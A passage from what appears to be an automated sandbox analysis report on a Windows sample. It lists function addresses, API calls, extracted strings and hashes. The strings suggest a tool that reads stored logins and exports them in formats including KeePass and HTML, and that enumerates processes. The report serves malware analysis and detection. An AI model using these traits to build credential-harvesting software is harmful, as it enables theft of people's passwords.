                                                                            • API String ID: 1607361635-601624466
                                                                            • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                            • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                            Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                            • API String ID: 2000436516-3842416460
                                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                            Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                            • String ID:
                                                                            • API String ID: 1043902810-0
                                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                            Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                            • free.MSVCRT ref: 0040E49A
                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                            • memset.MSVCRT ref: 0040E380
                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E3EC
                                                                            • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E407
                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E422
                                                                            • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E43D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                            • API String ID: 3849927982-2252543386
                                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                            Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                            • _snwprintf.MSVCRT ref: 0044488A
                                                                            • wcscpy.MSVCRT ref: 004448B4
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                            • API String ID: 2899246560-1542517562
                                                                            • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                            • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                            Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040DBCD
                                                                            • memset.MSVCRT ref: 0040DBE9
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                                            • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                            • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                            • API String ID: 3330709923-517860148
                                                                            • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                            • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                            Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                            • memset.MSVCRT ref: 0040806A
                                                                            • memset.MSVCRT ref: 0040807F
                                                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                                            • memset.MSVCRT ref: 004081E4
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                            • String ID: logins$null
                                                                            • API String ID: 2148543256-2163367763
                                                                            • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                            • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                            Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            • memset.MSVCRT ref: 004085CF
                                                                            • memset.MSVCRT ref: 004085F1
                                                                            • memset.MSVCRT ref: 00408606
                                                                            • strcmp.MSVCRT ref: 00408645
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                            • memset.MSVCRT ref: 0040870E
                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                            • String ID: ---
                                                                            • API String ID: 3437578500-2854292027
                                                                            • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                            • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                            Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041087D
                                                                            • memset.MSVCRT ref: 00410892
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                            • String ID:
                                                                            • API String ID: 1010922700-0
                                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                            Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                            • malloc.MSVCRT ref: 004186B7
                                                                            • free.MSVCRT ref: 004186C7
                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                            • free.MSVCRT ref: 004186E0
                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                            • malloc.MSVCRT ref: 004186FE
                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                            • free.MSVCRT ref: 00418716
                                                                            • free.MSVCRT ref: 0041872A
                                                                            • free.MSVCRT ref: 00418749
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$FullNamePath$malloc$Version
                                                                            • String ID: |A
                                                                            • API String ID: 3356672799-1717621600
                                                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                            Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                            • API String ID: 2081463915-1959339147
                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                            Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2012295524-70141382
                                                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                            Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                            • API String ID: 667068680-3953557276
                                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                            Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1700100422-0
                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                            Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
